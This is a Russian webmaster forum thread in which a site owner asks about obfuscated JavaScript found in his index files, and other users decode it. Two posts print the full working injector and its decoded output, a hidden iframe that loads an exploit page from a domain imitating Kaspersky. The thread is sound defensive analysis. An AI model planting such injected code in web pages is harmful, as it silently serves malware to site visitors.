Что может длать такой скрипт?

Владислав
На сайте с 22.02.2007
Offline
186
557

Совершенно случайно обнаружил код на всех своих сайтах такого плана:

<script>function v481294eb2b1f5(v481294eb2b9a7){ function v481294eb2c177 () {var v481294eb2c947=16; return v481294eb2c947;} return(parseInt(v481294eb2b9a7,v481294eb2c177()));}function v481294eb2d11a(v481294eb2d8e8){  var v481294eb2e0b7='';for(v481294eb2e886=0; v481294eb2e886<v481294eb2d8e8.length; v481294eb2e886+=2){ v481294eb2e0b7+=(String.fromCharCode(v484564354eb2b1f5(v481294eb2d8e8.substr(v481294eb2e886, 2))));}return v481294eb2e0b7;} document.write(v481294eb2d11a('3C69667456JHGJ78KJH762323636316227207372633D27687474703A2F2F6

B617373706572736B796C6162C2F696E6465782E706870272077696474683D343436206865696768743D323130207374796C653D27'));</script>

Для чего этот код кто-то вставил во все индексные файлы? Понятно что пароли на ftp надо менять, но все же интересно?

Причем это не вирус т.к. только на моих ftp, доступы к которым я иногда даю кому-либо есть такой код, на других ftp не моих куда я доступы не даю этого кода нет...

Читайте книжки, больше читайте книжки на самом деле...
y4an
На сайте с 21.07.2004
Offline
47
#1

вроде код скрипта не полный, т.к. не хватает функции v484564354eb2b1f5

а так, по всей видимости, должен прописывать не видимый ифрэйм

S
На сайте с 28.10.2005
Offline
299
#2

вирусня, подгружающяя ченить посетителям сайта

P
На сайте с 10.03.2008
Offline
168
#3

Скрипт не может работать, он не полный, или с ошибкой.

Но если заменить несущуствующую функцию существующей, то выводит такой код:

<iftVxb2661b' src='http://kassperskylab&#194;&#246;&#150;&#230;FW&#130;&#231;&#135;rv&#150;GF&#131;&#211;CCb&#134;V&#150;v&#135;C&#211;#7G&#150;&#198;S&#210;

Вобщем, или ифрейм, или картинку вставлять должен с некого src='http://kassperskylab[Что-то там непонятное]'.

S
На сайте с 09.10.2007
Offline
186
#4

kaspersylab скорее всего поддомен какогонить левого домена

Удобная панель для доменных имен (http://panel.started.ru/) с массовыми операциями. Индивидуальные цены по запросу.
DyaDya
На сайте с 11.04.2007
Offline
147
#5

Такой может ничего, ибо с ошибкой. Возможно нехватающая фунцкия в зараженном файле в другом месте прописана?!!!!

В общем, троянчег полюбому... Чтоже ещё хорошего можно ожидать от неожиданно появившегося iframe??

Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)
Владислав
На сайте с 22.02.2007
Offline
186
#6

Вот полный и правильный код, проверьте кто может

<script>function v4812d1a35ab7b(v4812d1a35b34e){ function v4812d1a35bb1a () {return 16;} return(parseInt(v4812d1a35b34e,v4812d1a35bb1a()));}function v4812d1a35d28e(v4812d1a35da74){ function v4812d1a35f1ea () {return 2;} var v4812d1a35e228='';for(v4812d1a35e9f9=0; v4812d1a35e9f9<v4812d1a35da74.length; v4812d1a35e9f9+=v4812d1a35f1ea()){ v4812d1a35e228+=(String.fromCharCode(v4812d1a35ab7b(v4812d1a35da74.substr(v4812d1a35e9f9, v4812d1a35f1ea()))));}return v4812d1a35e228;} document.write(v4812d1a35d28e('3C696672616D65206E616D653D273439396131656465646427207372633D27687474703A2F2F6B617373706572736B796C6162732E636E2F73706C2F696E6465782E706870272077696474683D363938206865696768743D343138207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
orphelin
На сайте с 02.07.2006
Offline
261
#7

а на каком хостинге сайт, если не секрет?

y4an
На сайте с 21.07.2004
Offline
47
#8

вот что выводит скрипт


<iframe name='499a1ededd' src='http://kassperskylabs.cn/spl/index.php' width=698 height=418 style='display:none'></iframe>
S
На сайте с 28.10.2005
Offline
299
#9

ACCESS DENIED

The requested URL could not be retrieved

While trying to retrive the URL: http://kassperskylabs.cn/spl/index.php

The folowing error was encountered:

The requested object is forbidden.

Generated Sat Apr 26 19:00:37 2008 by Kaspersky Internet Security 7.0

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий